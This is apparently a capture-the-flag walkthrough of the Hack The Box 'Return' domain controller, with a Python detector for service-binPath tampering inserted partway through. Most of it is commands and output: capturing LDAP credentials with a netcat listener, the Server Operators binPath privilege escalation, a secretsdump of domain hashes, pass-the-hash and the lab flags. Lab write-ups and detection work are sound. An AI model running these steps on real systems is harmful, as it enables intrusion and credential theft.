Proof of Concept

10.129.4.65

Nmap

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/Return]
└─$ nxc smb 10.129.4.65 --generate-hosts-file hosts
SMB         10.129.4.65     445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Return]
└─$ cat hosts
10.129.4.65     PRINTER.return.local return.local PRINTER

Configuring the /etc/hosts file

┌──(kali㉿kali)-[~/Return]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.4.65     PRINTER.return.local return.local PRINTER

Initial Access

Accessing the web service on port 80 shows that an "HTB Printer Admin Panel" is running.

Enumerating the site reveals http://return.local/settings.php.

┌──(kali㉿kali)-[~/Return]
└─$ feroxbuster -u http://return.local -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
 
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://return.local/
 🚩  In-Scope Url          │ return.local
 🚀  Threads               │ 100
 📖  Wordlist              │ /usr/share/dirb/wordlists/common.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       39l      196w    17216c http://return.local/images/1.png
200      GET     1345l     2796w    28274c http://return.local/index.php
200      GET     1376l     2855w    29090c http://return.local/settings.php
200      GET     1345l     2796w    28274c http://return.local/
[####################] - 29s    13898/13898   0s      found:4       errors:6
[####################] - 21s     4614/4614    218/s   http://return.local/
[####################] - 17s     4614/4614    266/s   http://return.local/images/
[####################] - 17s     4614/4614    268/s   http://return.local/Images/ 

Accessing http://return.local/settings.php shows the service settings page.

After opening a listener on port 389 locally, changing the Server Address on the settings page to the local IP address and clicking Update makes the panel connect back to the listener, which receives the svc-printer account credentials in cleartext:

  • svc-printer:1edFg43012!!

┌──(kali㉿kali)-[~/Return]
└─$ nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.4.65] 57995
0*`%return\svc-printer�
                       1edFg43012!!

WinRM login succeeds with the recovered svc-printer credentials.

┌──(kali㉿kali)-[~/Return]
└─$ nxc winrm return.local -u 'svc-printer' -p '1edFg43012!!'
WINRM       10.129.4.65     5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM       10.129.4.65     5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
 
┌──(kali㉿kali)-[~/Return]
└─$ evil-winrm -i return.local -u 'svc-printer' -p '1edFg43012!!'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
ca30f64bcdbe392216d84a351ae1ae90
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a6
   IPv6 Address. . . . . . . . . . . : dead:beef::d1b0:4eb:4176:1903
   Link-local IPv6 Address . . . . . : fe80::d1b0:4eb:4176:1903%10
   IPv4 Address. . . . . . . . . . . : 10.129.4.65
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%10
                                       10.129.0.1

Privilege Escalation

The svc-printer user is a member of the "Server Operators" group.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
 
USER INFORMATION
----------------
 
User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
 
 
GROUP INFORMATION
-----------------
 
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
 
<SNIP>

Members of "Server Operators" can change service configuration, so this privilege is abused to point the VMTools service binPath at a command that adds svc-printer to the Administrators group. The service start fails (the command is not a real service binary), but the command has already run by then.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="cmd.exe /c 'net localgroup Administrators svc-printer /add'"
[SC] ChangeServiceConfig SUCCESS
 
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
 
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.
 
 
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.
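The escalation above leaves two artefacts a defender can correlate: a service ImagePath rewritten to a shell command, and a member added to Administrators shortly afterwards. The Python below is an added example, not part of the original write-up, that runs that correlation over a constructed, simplified event format. The dict field names (`source`, `event_id`, `target_object`, `details`, `target_group_sid`, `member_name`, `host`, `user`, `time`) are assumptions standing in for the fields a SIEM would normalise out of Sysmon Event ID 13 (RegistryEvent, value set) and Security Event ID 4732 (a member was added to a security-enabled local group); the sample events are constructed to mirror the write-up's VMTools change.

```python
"""Correlate service ImagePath tampering with a later Administrators addition.

Added example (not from the original write-up). Input is a constructed,
simplified event format; field names are assumptions, not the EVTX schema.
"""
from datetime import datetime, timedelta
import re

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Sysmon Event 13 writes TargetObject as HKLM\System\CurrentControlSet\Services\<svc>\ImagePath
IMAGEPATH_RE = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE,
)

# A service binary that is really a shell or account-management command is
# almost never legitimate; these lowercase tokens cover the write-up's case.
SUSPICIOUS_TOKENS = ("cmd.exe", "powershell", "net localgroup", "net user", "net group")


def service_binpath_tampering(event):
    """Return (service_name, new_image_path) when a Sysmon 13 event sets a
    service ImagePath to a suspicious command, otherwise None."""
    if event.get("source") != "Sysmon" or event.get("event_id") != 13:
        return None
    match = IMAGEPATH_RE.match(event.get("target_object", ""))
    if not match:
        return None
    details = event.get("details", "")
    if any(tok in details.lower() for tok in SUSPICIOUS_TOKENS):
        return match.group(1), details
    return None


def admin_group_addition(event):
    """Return the added member when a Security 4732 event targets Administrators."""
    if event.get("source") != "Security" or event.get("event_id") != 4732:
        return None
    if event.get("target_group_sid") != ADMINISTRATORS_SID:
        return None
    return event.get("member_name")


def correlate(events, window=timedelta(minutes=10)):
    """Pair each suspicious ImagePath change with an Administrators addition on
    the same host within `window` after it. Returns a list of alert dicts."""
    tampering = []  # (event, (service, image_path)) seen so far, in time order
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        hit = service_binpath_tampering(ev)
        if hit:
            tampering.append((ev, hit))
            continue
        member = admin_group_addition(ev)
        if member is None:
            continue
        for prior, (svc, path) in tampering:
            if prior["host"] == ev["host"] and ev["time"] - prior["time"] <= window:
                alerts.append({
                    "host": ev["host"],
                    "actor": prior["user"],
                    "service": svc,
                    "image_path": path,
                    "added_member": member,
                })
    return alerts


# Constructed sample events: one tampering chain on PRINTER plus two benign records.
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    {"source": "Sysmon", "event_id": 13, "time": T0, "host": "PRINTER",
     "user": "RETURN\\svc-printer",
     "target_object": "HKLM\\System\\CurrentControlSet\\Services\\VMTools\\ImagePath",
     "details": "cmd.exe /c 'net localgroup Administrators svc-printer /add'"},
    {"source": "Security", "event_id": 4732, "time": T0 + timedelta(seconds=40),
     "host": "PRINTER", "user": "RETURN\\svc-printer",
     "target_group_sid": ADMINISTRATORS_SID, "member_name": "RETURN\\svc-printer"},
    # Benign: a normal service binary path set by SYSTEM.
    {"source": "Sysmon", "event_id": 13, "time": T0 + timedelta(minutes=1), "host": "PRINTER",
     "user": "NT AUTHORITY\\SYSTEM",
     "target_object": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "details": "C:\\Windows\\System32\\spoolsv.exe"},
    # Benign: an admin addition on another host with no preceding tampering.
    {"source": "Security", "event_id": 4732, "time": T0 + timedelta(minutes=2),
     "host": "WS01", "user": "RETURN\\helpdesk",
     "target_group_sid": ADMINISTRATORS_SID, "member_name": "RETURN\\jdoe"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Only the PRINTER chain produces an alert; the Spooler path and the unrelated addition on WS01 are ignored. In practice the same logic also catches the variant where the service is started rather than stopped, since it keys on the ImagePath write and the group change, not on the start/stop outcome.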

Dumping the Administrator NTLM hash with impacket-secretsdump, now that svc-printer is a local administrator:

  • 32db622ed9c00dd1039d8288b0407460

┌──(kali㉿kali)-[~/Return]
└─$ impacket-secretsdump svc-printer:'1edFg43012!!'@return.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:f41640df99fb51e8bf760586ce087bf5684e1e32ac184dd185e12bd899810124
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:171b5d6e99b9cc380638b4321a6f6d65
RETURN\PRINTER$:des-cbc-md5:ba9e9d3df7fbbcfb
RETURN\PRINTER$:plain_password_hex:986fcd73d3b55ed0d436e5086af34dbe7467fe423d355f699b9c58b4e4eb829882e4608fcd2397b9ef2f50d1cd0d29ce638f5757ab7391a728b3c33a160bcad0011a705182df55f56a8361a698700a8d14ff1583c5d1f4147c1658fc3df31bb49146bc12570ac851502308844dbe1743ee4253b3f051635c6e0644dc3da5a055bc43d2752d3e93a519ed89dcf3d92436a39fb946e445a04f27f242df67e4f0f379f3d5a251d76ac43f62ad248fcaf8248cf31df3eda0686af08d248612770677a25e37f6f5c601ee1185939f293d1aeb46050d06e78594411b2518a40cb64c9bb63fc15adc4c36f50a36f802c35f6e47
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:e7cd8901d8d8bd83330bd02576c2a7b9:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM
 0000   16 BD CA 34 21 A5 5C AD  51 ED B1 7E 4A 4F 59 B8   ...4!.\.Q..~JOY.
 0010   C3 65 1E 1A 5D 6D 97 82  79 3A 58 A0 FC 2B B5 8B   .e..]m..y:X..+..
 0020   A4 E2 9B CF DD 7B 52 80  99 33 45 4F F1 35 15 DC   .....{R..3EO.5..
 0030   4F 99 B3 A1 CB 55 21 A5  CC F5 27 43 F7 16 AA BC   O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:e7cd8901d8d8bd83330bd02576c2a7b9:::

Connecting over WinRM with the obtained Administrator NTLM hash:

┌──(kali㉿kali)-[~/Return]
└─$ evil-winrm -i return.local -u 'administrator' -H '32db622ed9c00dd1039d8288b0407460'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
2881fa82ca626ead2b6768ab671532e5
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a6
   IPv6 Address. . . . . . . . . . . : dead:beef::d1b0:4eb:4176:1903
   Link-local IPv6 Address . . . . . : fe80::d1b0:4eb:4176:1903%10
   IPv4 Address. . . . . . . . . . . : 10.129.4.65
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%10
                                       10.129.0.1